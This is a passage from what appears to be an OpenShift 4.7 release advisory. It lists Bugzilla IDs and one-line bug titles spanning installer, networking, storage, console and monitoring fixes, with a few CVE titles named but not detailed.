- The configmap name looks confusing in aide-ds pod logs\n1869606 - crio\u0027s failing to delete a network namespace\n1870337 - [sig-storage] Managed cluster should have no crashlooping recycler pods over four minutes\n1870342 - [sig-scheduling] SchedulerPredicates [Serial] validates resource limits of pods that are allowed to run  [Conformance]\n1870373 - Ingress Operator reports available when DNS fails to provision\n1870467 - D/DC Part of Helm / Operator Backed should not have HPA\n1870728 - openshift-install creates expired ignition files from stale .openshift_install_state.json\n1870800 - [4.6] Managed Column not appearing on Pods Details page\n1871170 - e2e tests are needed to validate the functionality of the etcdctl container\n1872001 - EtcdDiscoveryDomain no longer needed\n1872095 - content are expanded to the whole line when only one column in table on Resource Details page\n1872124 - Could not choose device type as \"disk\" or \"part\" when create localvolumeset from web console\n1872128 - Can\u0027t run container with hostPort on ipv6 cluster\n1872166 - \u0027Silences\u0027 link redirects to unexpected \u0027Alerts\u0027 view after creating a silence in the Developer perspective\n1872251 - [aws-ebs-csi-driver] Verify job in CI doesn\u0027t check for vendor dir sanity\n1872786 - Rules in kube-apiserver.rules are taking too long and consuming too much memory for Prometheus to evaluate them\n1872821 - [DOC] Typo in Ansible Operator Tutorial\n1872907 - Fail to create CR from generated Helm Base Operator\n1872923 - Click \"Cancel\" button on the \"initialization-resource\" creation form page should send users to the \"Operator details\" page instead of \"Install Operator\" page (previous page)\n1873007 - [downstream] failed to read config when running the operator-sdk in the home path\n1873030 - Subscriptions without any candidate operators should cause resolution to fail\n1873043 - Bump to latest available 1.19.x k8s\n1873114 - Nodes goes into NotReady state (VMware)\n1873288 - Changing Cluster-Wide Pull Secret Does Not Trigger Updates In Kubelet Filesystem\n1873305 - Failed to power on /inspect node when using Redfish protocol\n1873326 - Accessibility - The symbols e.g checkmark in the overview page has no text description, label, or other accessible information\n1873480 - Accessibility - No text description, alt text, label, or other accessible information associated with the help icon: \u201c?\u201d button/icon in Developer Console -\u003eNavigation\n1873556 - [Openstack] HTTP_PROXY setting for NetworkManager-resolv-prepender not working\n1873593 - MCO fails to cope with ContainerRuntimeConfig thas has a name \u003e 63 characters\n1874057 - Pod stuck in CreateContainerError - error msg=\"container_linux.go:348: starting container process caused \\\"chdir to cwd (\\\\\\\"/mount-point\\\\\\\") set in config.json failed: permission denied\\\"\"\n1874074 - [CNV] Windows 2019 Default Template Not Defaulting to Proper NIC/Storage Driver\n1874192 - [RFE] \"Create Backing Store\" page doesn\u0027t allow to select already defined k8s secret as target bucket credentials when Google Cloud Storage is selected as a provider\n1874240 - [vsphere] unable to deprovision - Runtime error list attached objects\n1874248 - Include validation for vcenter host in the install-config\n1874340 - vmware: NodeClockNotSynchronising alert is triggered in openshift cluster after upgrading form 4.4.16 to 4.5.6\n1874583 - apiserver tries and fails to log an event when shutting down\n1874584 - add retry for etcd errors in kube-apiserver\n1874638 - Missing logging for nbctl daemon\n1874736 - [downstream] no version info for the helm-operator\n1874901 - add utm_source parameter to Red Hat Marketplace URLs for attribution\n1874968 - Accessibility: The project selection drop down is a keyboard trap\n1875247 - Dependency resolution error \"found more than one head for channel\" is unhelpful for users\n1875516 - disabled scheduling is easy to miss in node page of OCP console\n1875598 - machine status is Running for a master node which has been terminated from the console\n1875806 - When creating a service of type \"LoadBalancer\" (Kuryr,OVN) communication through this loadbalancer failes after 2-5 minutes. \n1876166 - need to be able to disable kube-apiserver connectivity checks\n1876469 - Invalid doc link on yaml template schema description\n1876701 - podCount specDescriptor change doesn\u0027t take effect on operand details page\n1876815 - Installer uses the environment variable OS_CLOUD for manifest generation despite explicit prompt\n1876935 - AWS volume snapshot is not deleted after the cluster is destroyed\n1877071 - vSphere IPI - Nameserver limits were exceeded, some nameservers have been omitted\n1877105 - add redfish to enabled_bios_interfaces\n1877116 - e2e aws calico tests fail with `rpc error: code = ResourceExhausted`\n1877273 - [OVN] EgressIP cannot fail over to available nodes after one egressIP node shutdown\n1877648 - [sriov]VF from allocatable and capacity of node is incorrect when the policy is only \u0027rootDevices\u0027\n1877681 - Manually created PV can not be used\n1877693 - dnsrecords specify recordTTL as 30 but the value is null in AWS Route 53\n1877740 - RHCOS unable to get ip address during first boot\n1877812 - [ROKS] IBM cloud failed to terminate OSDs when upgraded between internal builds of OCS 4.5\n1877919 - panic in multus-admission-controller\n1877924 - Cannot set BIOS config using Redfish with Dell iDracs\n1878022 - Met imagestreamimport error when import the whole image repository\n1878086 - OCP 4.6+OCS 4.6(multiple SC) Internal Mode- UI should populate the default \"Filesystem Name\" instead of providing a textbox, \u0026 the name should be validated\n1878301 - [4.6] [UI] Unschedulable used to always be displayed when Node is Ready status\n1878701 - After deleting and recreating a VM with same name, the VM events contain the events from the old VM\n1878766 - CPU consumption on nodes is higher than the CPU count of the node. \n1878772 - On the nodes there are up to 547 zombie processes caused by thanos and Prometheus. \n1878823 - \"oc adm release mirror\" generating incomplete imageContentSources when using \"--to\" and \"--to-release-image\"\n1878845 - 4.5 to 4.6.rc.4 upgrade failure: authentication operator health check connection refused for multitenant mode\n1878900 - Installer complains about not enough vcpu for the baremetal flavor where generic bm flavor is being used\n1878953 - RBAC error shows when normal user access pvc upload page\n1878956 - `oc api-resources` does not include API version\n1878972 - oc adm release mirror removes the architecture information\n1879013 - [RFE]Improve CD-ROM interface selection\n1879056 - UI should allow to change or unset the evictionStrategy\n1879057 - [CSI Certificate Test] Test failed for CSI certification tests for CSIdriver openshift-storage.rbd.csi.ceph.com with RWX enabled\n1879094 - RHCOS dhcp kernel parameters not working as expected\n1879099 - Extra reboot during 4.5 -\u003e 4.6 upgrade\n1879244 - Error adding container to network \"ipvlan-host-local\": \"master\" field is required\n1879248 - OLM Cert Dir for Webhooks does not align SDK/Kubebuilder\n1879282 - Update OLM references to point to the OLM\u0027s new doc site\n1879283 - panic after nil pointer dereference in pkg/daemon/update.go\n1879365 - Overlapping, divergent openshift-cluster-storage-operator manifests\n1879419 - [RFE]Improve boot source description for \u0027Container\u0027 and \u2018URL\u2019\n1879430 - openshift-object-counts quota is not dynamically updating as the resource is deleted. \n1879565 - IPv6 installation fails on node-valid-hostname\n1879777 - Overlapping, divergent openshift-machine-api namespace manifests\n1879878 - Messages flooded in thanos-querier pod- oauth-proxy container: Authorization header does not start with \u0027Basic\u0027, skipping basic authentication in Log message in thanos-querier pod the oauth-proxy\n1879930 - Annotations shouldn\u0027t be removed during object reconciliation\n1879976 - No other channel visible from console\n1880068 - image pruner is not aware of image policy annotation, StatefulSets, etc. \n1880148 - dns daemonset rolls out slowly in large clusters\n1880161 - Actuator Update calls should have fixed retry time\n1880259 - additional network + OVN network installation failed\n1880389 - Pipeline Runs with skipped Tasks incorrectly show Tasks as \"Failed\"\n1880410 - Convert Pipeline Visualization node to SVG\n1880417 - [vmware] Fail to boot with Secure Boot enabled, kernel lockdown denies iopl access to afterburn\n1880443 - broken machine pool management on OpenStack\n1880450 - Host failed to install because its installation stage joined took longer than expected 20m0s. \n1880473 - IBM Cloudpak operators installation stuck \"UpgradePending\" with InstallPlan status updates failing due to size limitation\n1880680 - [4.3] [Tigera plugin] - openshift-kube-proxy fails - Failed to execute iptables-restore: exit status 4 (iptables-restore v1.8.4 (nf_tables)\n1880785 - CredentialsRequest missing description in `oc explain`\n1880787 - No description for Provisioning CRD for `oc explain`\n1880902 - need dnsPlocy set in crd ingresscontrollers\n1880913 - [DeScheduler] - change loglevel from Info to Error when priority class given in the descheduler params is not present in the cluster\n1881027 - Cluster installation fails at with error :  the container name \\\"assisted-installer\\\" is already in use\n1881046 - [OSP] openstack-cinder-csi-driver-operator doesn\u0027t contain required manifests and assets\n1881155 - operator install authentication: Authentication require functional ingress which requires at least one schedulable and ready node\n1881268 - Image uploading failed but wizard claim the source is available\n1881322 - kube-scheduler not scheduling pods for certificates not renewed automatically after nodes restoration\n1881347 - [v2v][ui]VM Import Wizard does not call Import provider cleanup\n1881881 - unable to specify target port manually resulting in application not reachable\n1881898 - misalignment of sub-title in quick start headers\n1882022 - [vsphere][ipi] directory path is incomplete, terraform can\u0027t find the cluster\n1882057 - Not able to select access modes for snapshot and clone\n1882140 - No description for spec.kubeletConfig\n1882176 - Master recovery instructions don\u0027t handle IP change well\n1882191 - Installation fails against external resources which lack DNS Subject Alternative Name\n1882209 - [ BateMetal IPI ] local coredns resolution not working\n1882210 - [release 4.7] insights-operator: Fix bug in reflector not recovering from \"Too large resource version\"\n1882268 - [e2e][automation]Add Integration Test for Snapshots\n1882361 - Retrieve and expose the latest report for the cluster\n1882485 - dns-node-resolver corrupts /etc/hosts if internal registry is not in use\n1882556 - git:// protocol in origin tests is not currently proxied\n1882569 - CNO: Replacing masters doesn\u0027t work for ovn-kubernetes 4.4\n1882608 - Spot instance not getting created on AzureGovCloud\n1882630 - Fstype is changed after deleting pv provisioned by localvolumeset instance\n1882649 - IPI installer labels all images it uploads into glance as qcow2\n1882653 - The Approval should display the Manual after the APPROVAL changed to Manual from the Automatic\n1882658 - [RFE] Volume Snapshot is not listed under inventory in Project Details page\n1882660 - Operators in a namespace should be installed together when approve one\n1882667 - [ovn] br-ex Link not found when scale up RHEL worker\n1882723 - [vsphere]Suggested mimimum value for providerspec not working\n1882730 - z systems not reporting correct core count in recording rule\n1882750 - [sig-api-machinery][Feature:APIServer][Late] kubelet terminates kube-apiserver gracefully\n1882781 - nameserver= option to dracut creates extra NM connection profile\n1882785 - Multi-Arch CI Jobs destroy libvirt network but occasionally leave it defined\n1882844 - [IPI on vsphere] Executing \u0027openshift-installer destroy cluster\u0027 leaves installer tag categories in vsphere\n1883371 - CVE-2020-26160 jwt-go: access restriction bypass vulnerability\n1883388 - Bare Metal Hosts Details page doesn\u0027t show Mainitenance and Power On/Off status\n1883422 - operator-sdk cleanup fail after installing operator with \"run bundle\" without installmode and og with ownnamespace\n1883425 - Gather top installplans and their count\n1883502 - Logging is broken due to mix of k8s.io/klog v1 and v2\n1883523 - [sig-cli] oc adm must-gather runs successfully for audit logs [Suite:openshift/conformance/parallel]\n1883538 - must gather report \"cannot file manila/aws ebs/ovirt csi related namespaces and objects\" error\n1883560 - operator-registry image needs clean up in /tmp\n1883563 - Creating duplicate namespace from create namespace modal breaks the UI\n1883614 - [OCP 4.6] [UI] UI should not describe power cycle as \"graceful\"\n1883642 - [sig-imageregistry][Feature:ImageTriggers][Serial] ImageStream admission TestImageStreamAdmitSpecUpdate\n1883660 - e2e-metal-ipi CI job consistently failing on 4.4\n1883765 - [user workload monitoring] improve latency of Thanos sidecar  when streaming read requests\n1883766 - [e2e][automation] Adjust tests for UI changes\n1883768 - [user workload monitoring] The Prometheus operator should discard invalid TLS configurations\n1883773 - opm alpha bundle build fails on win10 home\n1883790 - revert \"force cert rotation every couple days for development\" in 4.7\n1883803 - node pull secret feature is not working as expected\n1883836 - Jenkins imagestream ubi8 and nodejs12 update\n1883847 - The UI does not show checkbox for enable encryption at rest for OCS\n1883853 - go list -m all does not work\n1883905 - race condition in opm index add --overwrite-latest\n1883946 - Understand why trident CSI pods are getting deleted by OCP\n1884035 - Pods are illegally transitioning back to pending\n1884041 - e2e should provide error info when minimum number of pods aren\u0027t ready in kube-system namespace\n1884131 - oauth-proxy repository should run tests\n1884165 - Repos should be disabled in -firstboot.service before OS extensions are applied\n1884221 - IO becomes unhealthy due to a file change\n1884258 - Node network alerts should work on ratio rather than absolute values\n1884270 - Git clone does not support SCP-style ssh locations\n1884334 - CVO marks an upgrade as failed when an operator takes more than 20 minutes to rollout\n1884435 - vsphere - loopback is randomly not being added to resolver\n1884565 - oauth-proxy crashes on invalid usage\n1884584 - Kuryr controller continuously restarting due to unable to clean up Network Policy\n1884613 - Create Instance of Prometheus from operator returns blank page for non cluster-admin users\n1884628 - ovs-configuration service fails when the external network is configured on a tagged vlan on top of a bond device on a baremetal IPI deployment\n1884629 - Visusally impaired user using screen reader not able to select Admin/Developer console options in drop down menu. \n1884632 - Adding BYOK disk encryption through DES\n1884654 - Utilization of a VMI is not populated\n1884655 - KeyError on self._existing_vifs[port_id]\n1884664 - Operator install page shows \"installing...\" instead of going to install status page\n1884672 - Failed to inspect hardware. Reason: unable to start inspection: \u0027idrac\u0027\n1884691 - Installer blocks cloud-credential-operator manual mode on GCP and Azure\n1884724 - Quick Start: Serverless quickstart doesn\u0027t match Operator install steps\n1884739 - Node process segfaulted\n1884824 - Update baremetal-operator libraries to k8s 1.19\n1885002 - network kube-rbac-proxy scripts crashloop rather than non-crash looping\n1885138 - Wrong detection of pending state in VM details\n1885151 - [Cloud Team - Cluster API Provider Azure] Logging is broken due to mix of k8s.io/klog v1 and v2\n1885165 - NoRunningOvnMaster alert falsely triggered\n1885170 - Nil pointer when verifying images\n1885173 - [e2e][automation] Add test for next run configuration feature\n1885179 - oc image append fails on push (uploading a new layer)\n1885213 - Vertical Pod Autoscaler (VPA) not working with DeploymentConfig\n1885218 - [e2e][automation] Add virtctl to gating script\n1885223 - Sync with upstream (fix panicking cluster-capacity binary)\n1885235 - Prometheus: Logging is broken due to mix of k8s.io/klog v1 and v2\n1885241 - kube-rbac-proxy: Logging is broken due to mix of k8s.io/klog v1 and v2\n1885243 - prometheus-adapter: Logging is broken due to mix of k8s.io/klog v1 and v2\n1885244 - prometheus-operator: Logging is broken due to mix of k8s.io/klog v1 and v2\n1885246 - cluster-monitoring-operator: Logging is broken due to mix of k8s.io/klog v1 and v2\n1885249 - openshift-state-metrics: Logging is broken due to mix of k8s.io/klog v1 and v2\n1885308 - Supermicro nodes failed to boot via disk during installation when using IPMI and UEFI\n1885315 - unit tests fail on slow disks\n1885319 - Remove redundant use of group and kind of DataVolumeTemplate\n1885343 - Console doesn\u0027t load in iOS Safari when using self-signed certificates\n1885344 - 4.7 upgrade - dummy bug for 1880591\n1885358 - add p\u0026f configuration to protect openshift traffic\n1885365 - MCO does not respect the install section of systemd files when enabling\n1885376 - failed to initialize the cluster: Cluster operator marketplace is still updating\n1885398 - CSV with only Webhook conversion can\u0027t be installed\n1885403 - Some OLM events hide the underlying errors\n1885414 - Need to disable HTX when not using HTTP/2 in order to preserve HTTP header name case\n1885425 - opm index add cannot batch add multiple bundles that use skips\n1885543 - node tuning operator builds and installs an unsigned RPM\n1885644 - Panic output due to timeouts in openshift-apiserver\n1885676 - [OCP 4.7]UI should fallback to minimal deployment only after total CPU \u003c 30 || totalMemory \u003c 72 GiB for initial deployment\n1885702 - Cypress:  Fix \u0027aria-hidden-focus\u0027 accesibility violations\n1885706 - Cypress:  Fix \u0027link-name\u0027 accesibility violation\n1885761 - DNS fails to resolve in some pods\n1885856 - Missing registry v1 protocol usage metric on telemetry\n1885864 - Stalld service crashed under the worker node\n1885930 - [release 4.7] Collect ServiceAccount statistics\n1885940 - kuryr/demo image ping not working\n1886007 - upgrade test with service type load balancer will never work\n1886022 - Move range allocations to CRD\u0027s\n1886028 - [BM][IPI] Failed to delete node after scale down\n1886111 - UpdatingopenshiftStateMetricsFailed: DeploymentRollout of openshift-monitoring/openshift-state-metrics: got 1 unavailable replicas\n1886134 - Need to set GODEBUG=x509ignoreCN=0 in initrd\n1886154 - System roles are not present while trying to create new role binding through web console\n1886166 - 1885517 Clone - Not needed for 4.7 - upgrade from 4.5-\u003e4.6 causes broadcast storm\n1886168 - Remove Terminal Option for Windows Nodes\n1886200 - greenwave / CVP is failing on bundle validations, cannot stage push\n1886229 - Multipath support for RHCOS sysroot\n1886294 - Unable to schedule a pod due to Insufficient ephemeral-storage\n1886327 - Attempt to add a worker using bad roodDeviceHint: bmh and machine become Provisioned, no error in status\n1886353 - [e2e][automation] kubevirt-gating job fails for a missing virtctl URL\n1886397 - Move object-enum to console-shared\n1886423 - New Affinities don\u0027t contain ID until saving\n1886435 - Azure UPI uses deprecated command \u0027group deployment\u0027\n1886449 - p\u0026f: add configuration to protect oauth server traffic\n1886452 - layout options doesn\u0027t gets selected style on click i.e grey background\n1886462 - IO doesn\u0027t recognize namespaces - 2 resources with the same name in 2 namespaces -\u003e only 1 gets collected\n1886488 - move e2e test off of nfs image from docker.io/gmontero/nfs-server:latest\n1886524 - Change default terminal command for Windows Pods\n1886553 - i/o timeout experienced from build02 when targeting CI test cluster during test execution\n1886600 - panic: assignment to entry in nil map\n1886620 - Application behind service load balancer with PDB is not disrupted\n1886627 - Kube-apiserver pods restarting/reinitializing periodically\n1886635 - CVE-2020-8563 kubernetes: Secret leaks in kube-controller-manager when using vSphere Provider\n1886636 - Panic in machine-config-operator\n1886749 - Removing network policy from namespace causes inability to access pods through loadbalancer. \n1886751 - Gather MachineConfigPools\n1886766 - PVC dropdown has \u0027Persistent Volume\u0027 Label\n1886834 - ovn-cert is mandatory in both master and node daemonsets\n1886848 - [OSP] machine instance-state annotation discrepancy with providerStatus.instanceState\n1886861 - ordered-values.yaml not honored if values.schema.json provided\n1886871 - Neutron ports created for hostNetworking pods\n1886890 - Overwrite jenkins-agent-base imagestream\n1886900 - Cluster-version operator fills logs with \"Manifest: ...\" spew\n1886922 - [sig-network] pods should successfully create sandboxes by getting pod\n1886973 - Local storage operator doesn\u0027t include correctly populate LocalVolumeDiscoveryResult in console\n1886977 - [v2v]Incorrect VM Provider type displayed in UI while importing VMs through VMIO\n1887010 - Imagepruner met error \"Job has reached the specified backoff limit\" which causes image registry degraded\n1887026 - FC volume attach fails with \u201cno fc disk found\u201d error on OCP 4.6 PowerVM cluster\n1887040 - [upgrade] ovs pod crash for rhel worker when upgarde from 4.5 to 4.6\n1887046 - Event for LSO need update to avoid confusion\n1887088 - cluster-node-tuning-operator refers to missing cluster-node-tuned image\n1887375 - User should be able to specify volumeMode when creating pvc from web-console\n1887380 - Unsupported access mode should not be available to select when creating pvc by aws-ebs-csi-driver(gp2-csi) from web-console\n1887392 - openshift-apiserver: delegated authn/z should have ttl \u003e metrics/healthz/readyz/openapi interval\n1887428 - oauth-apiserver service should be monitored by prometheus\n1887441 - ingress misconfiguration may break authentication but ingress operator keeps reporting \"degraded: False\"\n1887454 - [sig-storage] In-tree Volumes [Driver: azure-disk] [Testpattern: Dynamic PV (ext4)] volumes should store data\n1887456 - It is impossible to attach the default NIC to a bridge with the latest version of OVN Kubernetes\n1887465 - Deleted project is still referenced\n1887472 - unable to edit application group for KSVC via gestures (shift+Drag)\n1887488 - OCP 4.6:  Topology Manager OpenShift E2E test fails:  gu workload attached to SRIOV networks should let resource-aligned PODs have working SRIOV network interface\n1887509 - Openshift-tests conformance TopologyManager tests run when Machine Config Operator is not installed on cluster\n1887525 - Failures to set master HardwareDetails cannot easily be debugged\n1887545 - 4.5 to 4.6 upgrade fails when external network is configured on a bond device: ovs-configuration service fails and node becomes unreachable\n1887585 - ovn-masters stuck in crashloop after scale test\n1887651 - [Internal Mode] Object gateway (RGW) in unknown state after OCP upgrade. \n1887737 - Test TestImageRegistryRemovedWithImages is failing on e2e-vsphere-operator\n1887740 - cannot install descheduler operator after uninstalling it\n1887745 - API server is throwing 5xx error code for 42.11% of requests for LIST events\n1887750 - `oc explain localvolumediscovery` returns empty description\n1887751 - `oc explain localvolumediscoveryresult` returns empty description\n1887778 - Add ContainerRuntimeConfig gatherer\n1887783 - PVC upload cannot continue after approve the certificate\n1887797 - [CNV][V2V] Default network type is bridge for interface bound to POD network in VMWare migration wizard\n1887799 - User workload monitoring prometheus-config-reloader OOM\n1887850 - [sig-auth][Feature:SCC][Early] should not have pod creation failures during install test is flaky\n1887863 - Installer panics on invalid flavor\n1887864 - Clean up dependencies to avoid invalid scan flagging\n1887934 - TestForwardedHeaderPolicyAppend, TestForwardedHeaderPolicyReplace, and TestForwardedHeaderPolicyIfNone consistently fail because of case-sensitive comparison\n1887936 - Kube-scheduler should be able to parse v1beta1 KubeSchedulerConfig\n1888015 - workaround kubelet graceful termination of static pods bug\n1888028 - prevent extra cycle in aggregated apiservers\n1888036 - Operator details shows old CRD versions\n1888041 - non-terminating pods are going from running to pending\n1888072 - Setting Supermicro node to PXE boot via Redfish doesn\u0027t take affect\n1888073 - Operator controller continuously busy looping\n1888118 - Memory requests not specified for image registry operator\n1888150 - Install Operand Form on OperatorHub is displaying unformatted text\n1888172 - PR 209 didn\u0027t update the sample archive, but machineset and pdbs are now namespaced\n1888227 - Failed to deploy some of container image on the recent OCP 4.6 nightly build\n1888292 - Fix CVE-2015-7501 affecting agent-maven-3.5\n1888311 - p\u0026f: make SAR traffic from oauth and openshift apiserver exempt\n1888363 - namespaces crash in dev\n1888378 - [IPI on Azure] errors destroying cluster when Azure resource group was never created\n1888381 - instance:node_network_receive_bytes_excluding_lo:rate1m value twice expected\n1888464 - installer missing permission definitions for TagResources and UntagResources when installing in existing VPC\n1888494 - imagepruner pod is error when image registry storage is not configured\n1888565 - [OSP] machine-config-daemon-firstboot.service failed with \"error reading osImageURL from rpm-ostree\"\n1888595 - cluster-policy-controller logs shows error which reads initial monitor sync has error\n1888601 - The poddisruptionbudgets is using the operator service account, instead of gather\n1888657 - oc doesn\u0027t know its name\n1888663 - sdn starts after kube-apiserver, delay readyz until oauth-apiserver is reachable\n1888671 - Document the Cloud Provider\u0027s ignore-volume-az setting\n1888738 - quay.io/openshift/origin-must-gather:latest is not a multi-arch, manifest-list image\n1888763 - at least one of these parameters (Vendor, DeviceID or PfNames) has to be defined in nicSelector in CR %s\", cr.GetName()\n1888827 - ovnkube-master may segfault when trying to add IPs to a nil address set\n1888861 - need to pass dual-stack service CIDRs to kube-apiserver in dual-stack cluster\n1888866 - AggregatedAPIDown permanently firing after removing APIService\n1888870 - JS error when using autocomplete in YAML editor\n1888874 - hover message are not shown for some properties\n1888900 - align plugins versions\n1888985 - Cypress:  Fix \u0027Ensures buttons have discernible text\u0027 accesibility violation\n1889213 - The error message of uploading failure is not clear enough\n1889267 - Increase the time out for creating template and upload image in the terraform\n1889348 - Project link should be removed from Application Details page, since it is inaccurate (Application Stages)\n1889374 - Kiali feature won\u0027t work on fresh 4.6 cluster\n1889388 - ListBundles returns incorrect replaces/skips when bundles have been added via semver-skippatch mode\n1889420 - OCP failed to add vsphere disk when pod moved to new node during cluster upgrade\n1889515 - Accessibility - The symbols e.g checkmark in the Node \u003e overview page has no text description, label, or other accessible information\n1889529 - [Init-CR annotation] Inline alert shows operand instance was needed still appearing after creating an Operand instance\n1889540 - [4.5 upgrade][alert]CloudCredentialOperatorDown\n1889577 - Resources are not shown on project workloads page\n1889620 - [Azure] - Machineset not scaling when publicIP:true in disconnected Azure enviroment\n1889630 - Scheduling disabled popovers are missing for Node status in Node Overview and Details pages\n1889692 - Selected Capacity is showing wrong size\n1889694 - usbguard fails to install as RHCOS extension due to missing libprotobuf.so.15\n1889698 - When the user clicked cancel at the Create Storage Class confirmation dialog all the data from the Local volume set goes off\n1889710 - Prometheus metrics on disk take more space compared to OCP 4.5\n1889721 - opm index add semver-skippatch mode does not respect prerelease versions\n1889724 - When LocalVolumeDiscovery CR is created form the LSO page User doesn\u0027t see the Disk tab\n1889767 - [vsphere] Remove certificate from upi-installer image\n1889779 - error when destroying a vSphere installation that failed early\n1889787 - OCP is flooding the oVirt engine with auth errors\n1889838 - race in Operator update after fix from bz1888073\n1889852 - support new AWS regions ap-east-1, af-south-1, eu-south-1\n1889863 - Router prints incorrect log message for namespace label selector\n1889891 - Backport timecache LRU fix\n1889912 - Drains can cause high CPU usage\n1889921 - Reported Degraded=False Available=False pair does not make sense\n1889928 - [e2e][automation] Add more tests for golden os\n1889943 - EgressNetworkPolicy does not work when setting Allow rule to a dnsName\n1890038 - Infrastructure status.platform not migrated to status.platformStatus causes warnings\n1890074 - MCO extension kernel-headers is invalid\n1890104 - with Serverless 1.10 version of trigger/subscription/channel/IMC is V1 as latest\n1890130 - multitenant mode consistently fails CI\n1890141 - move off docker.io images for build/image-eco/templates/jenkins e2e\n1890145 - The mismatched of font size for Status Ready and Health Check secondary text\n1890180 - FieldDependency x-descriptor doesn\u0027t support non-sibling fields\n1890182 - DaemonSet with existing owner garbage collected\n1890228 - AWS: destroy stuck on route53 hosted zone not found\n1890235 - e2e: update Protractor\u0027s checkErrors logging\n1890250 - workers may fail to join the cluster during an update from 4.5\n1890256 - Replacing a master node on a baremetal IPI deployment gets stuck when deleting the machine of the unhealthy member\n1890270 - External IP doesn\u0027t work if the IP address is not assigned to a node\n1890361 - s390x: Generate new ostree rpm with fix for rootfs immutability\n1890456 - [vsphere] mapi_instance_create_failed doesn\u0027t work on vsphere\n1890467 - unable to edit an application without a service\n1890472 - [Kuryr] Bulk port creation exception not completely formatted\n1890494 - Error assigning Egress IP on GCP\n1890530 - cluster-policy-controller doesn\u0027t gracefully terminate\n1890630 - [Kuryr] Available port count not correctly calculated for alerts\n1890671 - [SA] verify-image-signature using service account does not work\n1890677 - \u0027oc image info\u0027 claims \u0027does not exist\u0027 for application/vnd.oci.image.manifest.v1+json manifest\n1890808 - New etcd alerts need to be added to the monitoring stack\n1890951 - Mirror of multiarch images together with cluster logging case problems. It doesn\u0027t sync the \"overall\" sha it syncs only the sub arch sha. \n1890984 - Rename operator-webhook-config to sriov-operator-webhook-config\n1890995 - wew-app should provide more insight into why image deployment failed\n1891023 - ovn-kubernetes rbac proxy never starts waiting for an incorrect API call\n1891047 - Helm chart fails to install using developer console because of TLS certificate error\n1891068 - [sig-instrumentation] Prometheus when installed on the cluster shouldn\u0027t report any alerts in firing state apart from Watchdog and AlertmanagerReceiversNotConfigured [Early] failing due to TargetDown alert from kube-scheduler\n1891080 - [LSO] When Localvolumeset and SC is already created before OCS install Creation of LVD and LVS is skipped when user click created storage cluster from UI\n1891108 - p\u0026f: Increase the concurrency share of workload-low priority level\n1891143 - CVO deadlocked while shutting down, shortly after fresh cluster install (metrics goroutine)\n1891189 - [LSO] max device limit is accepting negative values. PVC is not getting created and no error is shown\n1891314 - Display incompatible helm charts for installation (kubeVersion of cluster doesn\u0027t meet requirements of chart)\n1891362 - Wrong metrics count for openshift_build_result_total\n1891368 - fync should be fsync for etcdHighFsyncDurations alert\u0027s annotations.message\n1891374 - fync should be fsync for etcdHighFsyncDurations critical alert\u0027s annotations.message\n1891376 - Extra text in Cluster Utilization charts\n1891419 - Wrong detail head on network policy detail page. \n1891459 - Snapshot tests should report stderr of failed commands\n1891498 - Other machine config pools do not show during update\n1891543 - OpenShift 4.6/OSP install fails when node flavor has less than 25GB, even with dedicated storage\n1891551 - Clusterautoscaler doesn\u0027t scale up as expected\n1891552 - Handle missing labels as empty. \n1891555 - The windows oc.exe binary does not have version metadata\n1891559 - kuryr-cni cannot start new thread\n1891614 - [mlx] testpmd fails inside OpenShift pod using DevX version 19.11\n1891625 - [Release 4.7] Mutable LoadBalancer Scope\n1891702 - installer get pending when additionalTrustBundle is added into  install-config.yaml\n1891716 - OVN cluster upgrade from 4.6.1 to 4.7 fails\n1891740 - OperatorStatusChanged is noisy\n1891758 - the authentication operator may spam DeploymentUpdated event endlessly\n1891759 - Dockerfile builds cannot change /etc/pki/ca-trust\n1891816 - [UPI] [OSP] control-plane.yml provisioning playbook fails on OSP 16.1\n1891825 - Error message not very informative in case of mode mismatch\n1891898 - The ClusterServiceVersion can define Webhooks that cannot be created. \n1891951 - UI should show warning while creating pools with compression on\n1891952 - [Release 4.7] Apps Domain Enhancement\n1891993 - 4.5 to 4.6 upgrade doesn\u0027t remove deployments created by marketplace\n1891995 - OperatorHub displaying old content\n1891999 - Storage efficiency card showing wrong compression ratio\n1892004 - OCP 4.6 opm on Ubuntu 18.04.4 - error /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.28\u0027 not found (required by ./opm)\n1892167 - [SR-IOV] SriovNetworkNodePolicies apply ignoring the spec.nodeSelector. \n1892198 - TypeError in \u0027Performance Profile\u0027 tab displayed for \u0027Performance Addon Operator\u0027\n1892288 - assisted install workflow creates excessive control-plane disruption\n1892338 - HAProxyReloadFail alert only briefly fires in the event of a broken HAProxy config\n1892358 - [e2e][automation] update feature gate for kubevirt-gating job\n1892376 - Deleted netnamespace could not be re-created\n1892390 - TestOverwrite/OverwriteBundle/DefaultBehavior in operator-registry is flaky\n1892393 - TestListPackages is flaky\n1892448 - MCDPivotError alert/metric missing\n1892457 - NTO-shipped stalld needs to use FIFO for boosting. \n1892467 - linuxptp-daemon crash\n1892521 - [AWS] Startup bootstrap machine failed due to ignition file is missing in disconnected UPI env\n1892653 - User is unable to create KafkaSource with v1beta\n1892724 - VFS added to the list of devices of the nodeptpdevice CRD\n1892799 - Mounting additionalTrustBundle in the operator\n1893117 - Maintenance mode on vSphere blocks installation. \n1893351 - TLS secrets are not able to edit on console. \n1893362 - The ovs-xxxxx_openshift-sdn container does not terminate gracefully, slowing down reboots\n1893386 - false-positive ReadyIngressNodes_NoReadyIngressNodes: Auth operator makes risky \"worker\" assumption when guessing about ingress availability\n1893546 - Deploy using virtual media fails on node cleaning step\n1893601 - overview filesystem utilization of OCP is showing the wrong values\n1893645 - oc describe route SIGSEGV\n1893648 - Ironic image building process is not compatible with UEFI secure boot\n1893724 - OperatorHub generates incorrect RBAC\n1893739 - Force deletion doesn\u0027t work for snapshots if snapshotclass is already deleted\n1893776 - No useful metrics for image pull time available, making debugging issues there impossible\n1893798 - Lots of error messages starting with \"get namespace to enqueue Alertmanager instances failed\" in the logs of prometheus-operator\n1893832 - ErrorCount field is missing in baremetalhosts.metal3.io CRD\n1893889 - disabled dropdown items in the pf dropdown component are skipped over and unannounced by JAWS\n1893926 - Some \"Dynamic PV (block volmode)\" pattern storage e2e tests are wrongly skipped\n1893944 - Wrong product name for Multicloud Object Gateway\n1893953 - (release-4.7) Gather default StatefulSet configs\n1893956 - Installation always fails at \"failed to initialize the cluster: Cluster operator image-registry is still updating\"\n1893963 - [Testday] Workloads-\u003e Virtualization is not loading for Firefox browser\n1893972 - Should skip e2e test cases as early as possible\n1894013 - [v2v][Testday] VMware to CNV VM import]VMware URL: It is not clear that only the FQDN/IP address is 